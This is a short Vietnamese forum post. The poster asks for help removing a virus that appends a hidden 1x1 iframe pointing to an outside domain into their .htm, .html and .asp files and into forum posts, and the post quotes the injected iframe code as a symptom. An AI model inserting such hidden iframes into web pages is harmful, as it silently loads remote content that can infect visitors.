mấy bác giúp em fix con virus quái gì mà cứ chèn đoạn mã "<iframe src="http://NtKrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>" vào cuối mã HTML (trước thẻ </BODY>) của hầu hết các file .htm hoặc .html và kể cả chèn vào file .asp. Còn khi post các bài lên một số diễn đàn thì nó tự động chèn "< style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" ="http://NtKrnlpa.info/rc/?i=1" width=1 height=1>" vào đầu bài post